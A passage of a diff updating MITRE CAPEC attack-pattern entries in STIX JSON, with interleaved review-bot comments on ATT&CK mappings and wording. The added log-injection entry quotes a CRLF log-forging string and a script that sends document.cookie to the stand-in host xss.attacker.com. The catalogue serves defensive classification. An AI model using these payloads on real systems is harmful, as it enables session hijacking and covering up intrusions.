"description": "The attacker may submit a malicious signed code from another language to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. For instance, Java code cannot perform unsafe operations, such as modifying arbitrary memory locations, due to restrictions placed on it by the Byte code Verifier and the JVM. If allowed, Java code can call directly into native C code, which may perform unsafe operations, such as call system calls and modify arbitrary memory locations on their behalf. To provide isolation, Java does not grant untrusted code with unmediated access to native C code. Instead, the sandboxed code is typically allowed to call some subset of the pre-existing native code that is part of standard libraries.",
|
||||
"external_references": [
|
||||
@@ -60,6 +60,7 @@
|
||||
"x_capec_example_instances": [
|
||||
"Exploit: Java/ByteVerify.C is a detection of malicious code that attempts to exploit a vulnerability in the Microsoft Virtual Machine (VM). The VM enables Java programs to run on Windows platforms. The Microsoft Java VM is included in most versions of Windows and Internet Explorer. In some versions of the Microsoft VM, a vulnerability exists because of a flaw in the way the ByteCode Verifier checks code when it is initially being loaded by the Microsoft VM. The ByteCode Verifier is a low level process in the Microsoft VM that is responsible for checking the validity of code - or byte code - as it is initially being loaded into the Microsoft VM. Java/ByteVerify.C attempts to download a file named \"msits.exe\", located in the same virtual directory as the Java applet, into the Windows system folder, and with a random file name. It then tries to execute this specific file. This flaw enables attackers to execute arbitrary code on a user's machine such as writing, downloading and executing additional malware. This vulnerability is addressed by update MS03-011, released in 2003."
|
||||
],
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Probing: </b>The attacker probes the target application to see whether calling signed code from another language is allowed within a sandbox.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>The attacker probes the target application to see whether calling signed code from another language is allowed within a sandbox.</td></tr></tbody></table><li> <p> <b>Analysis: </b>The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Verify the exploitable security weaknesses: </b>The attacker tries to craft malicious signed code from another language allowed by the sandbox to verify the security weaknesses of the standard libraries found in the Explore phase.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>The attacker tries to explore the security weaknesses by calling malicious signed code from another language allowed by the sandbox.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Exploit the security weaknesses in the standard libraries: </b>The attacker calls signed malicious code from another language to exploit the security weaknesses in the standard libraries verified in the Experiment phase. The attacker will be able to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>The attacker calls signed malicious code from another language to exploit the security weaknesses in the standard libraries.</td></tr></tbody></table></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "Low",
|
||||
"x_capec_prerequisites": [
|
||||
"A framework-based language that supports code signing and sandbox (such as Java, .Net, JavaScript, and Flash) Deployed code that has been signed by its authoring vendor, or a partner"
|
||||
@@ -72,7 +73,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Very High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--8e3a9e9a-f034-4d51-a933-5b86c2b5f433",
|
||||
"id": "bundle--63858d99-6799-4407-b9c7-aefc3ca45a62",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -67,7 +67,7 @@
|
||||
],
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--da22a5db-ec9e-4b0a-a4ef-0809dddb5d0e",
|
||||
"id": "bundle--784bbfce-8836-4c17-be77-72e3313b205b",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -23,7 +23,7 @@
|
||||
],
|
||||
"x_capec_abstraction": "Detailed",
|
||||
"x_capec_status": "Deprecated",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--60527e2f-5040-41f9-9f21-ed24df665c31",
|
||||
"id": "bundle--5388c3a3-69b0-4e95-84c4-a0a3055d8b22",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,9 +8,9 @@
|
||||
"id": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2018-07-31T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Log Injection-Tampering-Forging",
|
||||
"description": "This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing him to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.",
|
||||
"description": "This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing them to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.",
|
||||
"external_references": [
|
||||
{
|
||||
"source_name": "capec",
|
||||
@@ -37,6 +37,12 @@
|
||||
"url": "http://cwe.mitre.org/data/definitions/713.html",
|
||||
"external_id": "CWE-713"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Indicator Removal on Host",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1070",
|
||||
"external_id": "T1070"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "J. Viega, G. McGraw, Building Secure Software, 2002, Addison-Wesley",
|
||||
@@ -74,6 +80,7 @@
|
||||
"Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50, and possibly earlier versions, allows remote attackers to enter false payment entries into the log file via HTTP POST requests to ipn_success.php. See also: CVE-2006-0201",
|
||||
"\n <xhtml:p>If a user submits the string \"twenty-one\" for val, the following entry is logged:</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"result\">INFO: Failed to parse val=twenty-one</xhtml:div>\n <xhtml:p>However, if an attacker submits the string</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"attack\">twenty-one%0a%0aINFO:+User+logged+out%3dbadguy</xhtml:div>\n <xhtml:p>the following entry is logged:</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"result\">INFO: Failed to parse val=twenty-oneINFO: User logged out=badguy</xhtml:div>\n <xhtml:p>Clearly, attackers can use this same mechanism to insert arbitrary log entries.</xhtml:p>\n "
|
||||
],
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Determine Application's Log File Format: </b>The first step is exploratory meaning the attacker observes the system. The attacker looks for action and data that are likely to be logged. The attacker may be familiar with the log format of the system.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Determine logging utility being used by application (e.g. log4j)</td></tr><tr><td>Gain access to application's source code to determine log file formats.</td></tr><tr><td>Install or obtain access to instance of application and observe its log file format.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Manipulate Log Files: </b>The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted input that the target software will write to the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>\n <xhtml:p>Use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry. For example:</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"attack\">\"%0D%0A[Thu%20Nov%2012%2011:22]:Info:%20User%20admin%20logged%20in\"</xhtml:div>\n <xhtml:p>may add the following forged entry into a log file:</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"result\">\"[Thu Nov 12 12:11:22]:Info: User admin logged in\"</xhtml:div>\n <xhtml:p>Different applications may require different encodings of the carriage return and line feed characters.</xhtml:p>\n </td></tr><tr><td>\n <xhtml:p>Insert a script into the log file such that if it is viewed using a web browser, the attacker will get a copy of the operator/administrator's cookie and will be able to gain access as that user. 
For example, a log file entry could contain</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"attack\"><script>new Image().src=\"http://xss.attacker.com/log_cookie?cookie=\"+encodeURI(document.cookie);</script></xhtml:div>\n <xhtml:p>The script itself will be invisible to anybody viewing the logs in a web browser (unless they view the source for the page).</xhtml:p>\n </td></tr></tbody></table></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "High",
|
||||
"x_capec_prerequisites": [
|
||||
"The target host is logging the action and data of the user.",
|
||||
@@ -85,7 +92,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--4db3532d-0a5c-4894-b230-14a34b0cd1fa",
|
||||
"id": "bundle--7f6d7a0c-a960-46e8-9e4a-591eb61daf0c",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -40,7 +40,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--9924d230-7833-4f94-b891-dd4ae84fdecc",
|
||||
"id": "bundle--2ac027f1-cdb6-479b-ba46-6681282e9587",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -36,7 +36,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--5f72f01c-e1e2-48ab-bb5c-8cf6f68d17c4",
|
||||
"id": "bundle--db17c7e3-e444-4de1-b3f3-7372d0007eab",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -89,7 +89,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--90db9e44-bdc4-41c5-89fd-8d1601c0cdc7",
|
||||
"id": "bundle--18831a2a-87eb-4e3b-bcb4-7315039730ec",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -36,7 +36,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--c4e3a448-6bf4-4ae0-b870-d1161a2210fb",
|
||||
"id": "bundle--61a0dd37-3266-4415-bf83-4f2a406143e5",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -30,7 +30,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--e0c7156d-5ba1-4051-98db-5d2ad103acc3",
|
||||
"id": "bundle--2e2c329a-58f4-4441-9b50-836627501587",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -23,7 +23,7 @@
|
||||
],
|
||||
"x_capec_abstraction": "Detailed",
|
||||
"x_capec_status": "Deprecated",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--16677edd-a87f-4fe0-a337-ef7fec934ede",
|
||||
"id": "bundle--749133ab-1802-44f6-ba57-594b6dc2dd77",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,9 +8,9 @@
|
||||
"id": "attack-pattern--2231936f-0dda-4736-a089-9e734231907c",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2019-04-04T00:00:00.000Z",
|
||||
"name": "Read Sensitive Strings Within an Executable",
|
||||
"description": "An adversary engages in activities to discover any sensitive strings are present within the compiled code of an executable, such as literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis. One specific example of a sensitive string is a hard-coded password. Typical examples of software with hard-coded passwords include server-side executables which may check for a hard-coded password or key during a user's authentication with the server. Hard-coded passwords can also be present in client-side executables which utilize the password or key when connecting to either a remote component, such as a database server, licensing server, or otherwise, or a processes on the same host that expects a key or password. When analyzing an executable the adversary may search for the presence of such strings by analyzing the byte-code of the file itself. Example utilities for revealing strings within a file include 'strings,' 'grep,' or other variants of these programs depending upon the type of operating system used. These programs can be used to dump any ASCII or UNICODE strings contained within a program. Strings can also be searched for using a hex editors by loading the binary or object code file and utilizing native search functions such as regular expressions.",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Read Sensitive Constants Within an Executable",
|
||||
"description": "\n <xhtml:p>An adversary engages in activities to discover any sensitive constants present within the compiled code of an executable.</xhtml:p>\n <xhtml:p>These constants may include literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis. One specific example of a sensitive string is a hard-coded password. Typical examples of software with hard-coded passwords include server-side executables which may check for a hard-coded password or key during a user's authentication with the server. Hard-coded passwords can also be present in client-side executables which utilize the password or key when connecting to either a remote component, such as a database server, licensing server, or otherwise, or a processes on the same host that expects a key or password. When analyzing an executable the adversary may search for the presence of such strings by analyzing the byte-code of the file itself. Example utilities for revealing strings within a file include 'strings,' 'grep,' or other variants of these programs depending upon the type of operating system used. These programs can be used to dump any ASCII or UNICODE strings contained within a program. Strings can also be searched for using a hex editors by loading the binary or object code file and utilizing native search functions such as regular expressions.</xhtml:p>\n <xhtml:p>Additionally, sensitive numeric values can occur within an executable. This can be used to discover the location of cryptographic constants.</xhtml:p>\n ",
|
||||
"external_references": [
|
||||
{
|
||||
"source_name": "capec",
|
||||
@@ -22,6 +22,12 @@
|
||||
"url": "http://cwe.mitre.org/data/definitions/798.html",
|
||||
"external_id": "CWE-798"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Unsecured Credentials:Credentials in files",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1552/001",
|
||||
"external_id": "T1552.001"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "Wikipedia, The Wikimedia Foundation, Inc",
|
||||
@@ -53,7 +59,7 @@
|
||||
],
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
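Review bot: The ATT&CK reference added at `"url": "https://attack.mitre.org/wiki/Technique/T1552/001"` uses the path scheme of the retired wiki site; as far as I can tell the current site serves techniques at `https://attack.mitre.org/techniques/T1552/001/`, so tools that dereference these URLs will depend on a redirect that is not guaranteed to persist. Consider emitting the canonical form, `"url": "https://attack.mitre.org/techniques/T1552/001/"`, and applying the same scheme to the other `ATTACK` references introduced in this commit. The rewritten description's closing sentence (`Additionally, sensitive numeric values can occur within an executable. This can be used to discover the location of cryptographic constants.`) does not say which values are meant; something like `...for example S-box tables or initialization constants, whose known byte patterns can be used to locate cryptographic routines` would make the point actionable. The carried-over wording `code refactoring methods including static and dynamic analysis` presumably means reverse-engineering rather than refactoring, and `a processes on the same host` and `using a hex editors` are typos that survived the rewrite.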
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--96fe9cb5-6cb7-4e1b-b6a5-605248aab970",
|
||||
"id": "bundle--02a29359-05f2-4558-91af-3a569839f707",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -50,7 +50,7 @@
|
||||
],
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "Medium",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--22618bbf-3029-4521-bd33-5e0417f36fe3",
|
||||
"id": "bundle--c1be5b05-cc27-4869-9a23-8f15da5b5a20",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2019-09-30T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Reflection Attack in Authentication Protocol",
|
||||
"description": "An attacker can abuse an authentication protocol susceptible to reflection attack in order to defeat it. Doing so allows the attacker illegitimate access to the target system, without possessing the requisite credentials. Reflection attacks are of great concern to authentication protocols that rely on a challenge-handshake or similar mechanism. An attacker can impersonate a legitimate user and can gain illegitimate access to the system by successfully mounting a reflection attack during authentication.",
|
||||
"external_references": [
|
||||
@@ -55,6 +55,7 @@
|
||||
"x_capec_example_instances": [
|
||||
"\n <xhtml:p>A single sign-on solution for a network uses a fixed pre-shared key with its clients to initiate the sign-on process in order to avoid eavesdropping on the initial exchanges.</xhtml:p>\n <xhtml:p>An attacker can use a reflection attack to mimic a trusted client on the network to participate in the sign-on exchange.</xhtml:p>\n "
|
||||
],
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Experiment</h3><ol><li> <p>The attacker opens a connection to the target server and sends it a challenge</p></li><li> <p>The server responds by returning the challenge encrypted with a shared secret as well as its own challenge to the attacker</p></li><li> <p>Since the attacker does not possess the shared secret, they initiate a second connection to the server and sends it, as challenge, the challenge received from the server on the first connection</p></li><li> <p>The server treats this as just another handshake and responds by encrypting the challenge and issuing its own to the attacker</p></li><li> <p>The attacker now receives the encrypted challenge on the second connection and sends it as response to the server on the first connection, thereby successfully completing the handshake and authenticating to the server.</p></li></ol></div>",
|
||||
"x_capec_likelihood_of_attack": "High",
|
||||
"x_capec_prerequisites": [
|
||||
"The attacker must have direct access to the target server in order to successfully mount a reflection attack. An intermediate entity, such as a router or proxy, that handles these exchanges on behalf of the attacker inhibits the attackers' ability to attack the authentication protocol."
|
||||
@@ -67,7 +68,7 @@
|
||||
},
|
||||
"x_capec_status": "Draft",
|
||||
"x_capec_typical_severity": "High",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
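Review bot: The new execution flow's step 3 (`they initiate a second connection to the server and sends it, as challenge, the challenge received from the server on the first connection`) depends on two conditions that `"x_capec_prerequisites"` does not state: the server must accept a second handshake while the first is still pending, and it must answer a challenge it itself issued, i.e. it uses the same key and message format in both directions. Those are exactly what the usual defence removes (distinct keys per direction, or binding the responder's identity into the encrypted challenge), so I would add them next to the existing direct-access prerequisite, e.g. `"The server accepts concurrent authentication exchanges and uses the same shared key and message format both for challenges it issues and for challenges it answers."`. Minor: step 3 mixes number (`they initiate ... and sends`).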
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--0331f548-a99b-4b02-a082-a4148f332f2b",
|
||||
"id": "bundle--1b11018c-5840-4322-b690-b60e0800edc9",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,7 +8,7 @@
|
||||
"id": "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2015-11-09T00:00:00.000Z",
|
||||
"modified": "2019-04-04T00:00:00.000Z",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Application Footprinting",
|
||||
"description": "An adversary engages in active probing and exploration activities to determine the type or version of an application installed on a remote target. This differs from fingerprinting where the attacker's action is passive through the examination of application output.",
|
||||
"external_references": [
|
||||
@@ -16,6 +16,12 @@
|
||||
"source_name": "capec",
|
||||
"url": "https://capec.mitre.org/data/definitions/580.html",
|
||||
"external_id": "CAPEC-580"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Software Discovery",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1518",
|
||||
"external_id": "T1518"
|
||||
}
|
||||
],
|
||||
"object_marking_refs": [
|
||||
@@ -36,7 +42,7 @@
|
||||
},
|
||||
"x_capec_status": "Stable",
|
||||
"x_capec_typical_severity": "Low",
|
||||
"x_capec_version": "3.2"
|
||||
"x_capec_version": "3.3"
|
||||
}
|
||||
]
|
||||
}
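Review bot: The added `ATTACK` mapping to `T1518` (Software Discovery) sits oddly with the description's own definition of this pattern as remote active probing to determine an application's type or version, since T1518, as I understand it, covers an adversary enumerating installed software on a host they already control. If the mapping is intentional, a sentence in `"description"` noting that the ATT&CK technique is the post-compromise, on-host analogue would stop analysts from treating the two as equivalent; otherwise a pre-access reconnaissance technique, if the targeted ATT&CK version has one, would be a closer fit. The URL also uses the `/wiki/Technique/` path rather than the current `/techniques/T1518/` form.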
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"type": "bundle",
|
||||
"id": "bundle--6656678d-8b60-4b37-8896-4c933f1625d6",
|
||||
"id": "bundle--a3d84ad6-0224-4c8b-bb84-442b15c44c4b",
|
||||
"spec_version": "2.0",
|
||||
"objects": [
|
||||
{
|
||||
@@ -8,9 +8,9 @@
|
||||
"id": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228",
|
||||
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
|
||||
"created": "2014-06-23T00:00:00.000Z",
|
||||
"modified": "2015-11-09T00:00:00.000Z",
|
||||
"name": "Exploitation of Trusted Credentials",
|
||||
"description": "Attacks on session IDs and resource IDs take advantage of the fact that some software accepts user input without verifying its authenticity. For example, a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or indeed the process that wrote the message to the queue are authentic and authorized to do so. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes \"trust\" other systems because they are behind a firewall. In a similar way servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Session IDs may be guessed due to insufficient randomness, poor protection (passed in the clear), lack of integrity (unsigned), or improperly correlation with access control policy enforcement points. Exposed configuration and properties files that contain system passwords, database connection strings, and such may also give an attacker an edge to identify these identifiers. The net result is that spoofing and impersonation is possible leading to an attacker's ability to break authentication, authorization, and audit controls on the system.",
|
||||
"modified": "2020-07-30T00:00:00.000Z",
|
||||
"name": "Exploitation of Trusted Identifiers",
|
||||
"description": "\n <xhtml:p>An adversary guesses, obtains, or \"rides\" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service. Attacks leveraging trusted identifiers typically result in the adversary laterally moving within the local network, since users are often allowed to authenticate to systems/applications within the network using the same identifier. This further allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.</xhtml:p>\n <xhtml:p>Attacks on trusted identifiers take advantage of the fact that some software accepts user input without verifying its authenticity. For example, in a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or the process that wrote the message to the queue is authentic and authorized to do so. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes \"trust\" other systems because they are behind a firewall. Similarly, servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Identifiers may be guessed or obtained due to insufficient randomness, poor protection (passed/stored in the clear), lack of integrity (unsigned), or improper correlation with access control policy enforcement points. 
Exposed configuration and properties files that contain sensitive data may additionally provide an adversary with the information needed to obtain these identifiers. An adversary may also \"ride\" an identifier via a malicious link, as is the case in Cross Site Request Forgery (CSRF) attacks.</xhtml:p>\n <xhtml:p>Regardless of the attack vector, successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.</xhtml:p>\n ",
|
||||
"external_references": [
|
||||
{
|
||||
"source_name": "capec",
|
||||
@@ -62,6 +62,12 @@
|
||||
"url": "http://cwe.mitre.org/data/definitions/642.html",
|
||||
"external_id": "CWE-642"
|
||||
},
|
||||
{
|
||||
"source_name": "ATTACK",
|
||||
"description": "Access Token Manipulation:Token Impersonation/Theft",
|
||||
"url": "https://attack.mitre.org/wiki/Technique/T1134/001",
|
||||
"external_id": "T1134.001"
|
||||
},
|
||||
{
|
||||
"source_name": "reference_from_CAPEC",
|
||||
"description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
|
||||
@@ -76,7 +82,7 @@
|
||||
"Access_Control": [
|
||||
"Gain Privileges"
|
||||
],
|
||||
"Authorization": [
|
||||
"Authentication": [
|
||||
"Gain Privileges"
|
||||
],
|
||||
"Confidentiality": [
|
||||
@@ -88,21 +94,25 @@
|
||||
]
|
||||
},
|
||||
"x_capec_example_instances": [
|
||||
"\n <xhtml:p>Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an attacker to impersonate a user's session in effect, have the same capabilities as the authorized user. There are two main ways for an attacker to exploit session IDs.</xhtml:p>\n <xhtml:p>A brute force attack involves an attacker repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an attacker can retry several hundred or thousand request with little to no issue on their side.</xhtml:p>\n <xhtml:p>The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The attacker can then use these variables and access the application.</xhtml:p>\n "
|
||||
"\n <xhtml:p>Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an adversary to impersonate a user's session in effect, have the same capabilities as the authorized user. There are two main ways for an adversary to exploit session IDs.</xhtml:p>\n <xhtml:p>A brute force attack involves an adversary repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an adversary can retry several hundred or thousand request with little to no issue on their side.</xhtml:p>\n <xhtml:p>The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The adversary can then use these variables and access the application.</xhtml:p>\n "
|
||||
],
|
||||
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Survey the application for Indicators of Susceptibility: </b>Using a variety of methods, until one is found that applies to the target, the adversary probes for cookies, session tokens, or entry points that bypass identifiers altogether.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Spider all available pages</td></tr><tr><td>Attack known bad interfaces</td></tr><tr><td>Search outward-facing configuration and properties files for identifiers.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Fetch samples: </b>The adversary fetches many samples of identifiers. This may be through legitimate access (logging in, legitimate connections, etc.) or via systematic probing.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>An adversary makes many anonymous connections and records the session IDs assigned.</td></tr><tr><td>An adversary makes authorized connections and records the session tokens or credentials issued.</td></tr><tr><td>An adversary gains access to (legitimately or illegitimately) a nearby system (e.g., in the same operations network, DMZ, or local network) and makes a connection from it, attempting to gain the same privileges as a trusted system.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Impersonate: </b>An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application</p></li><li> <p> <b>Spoofing: </b>Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate 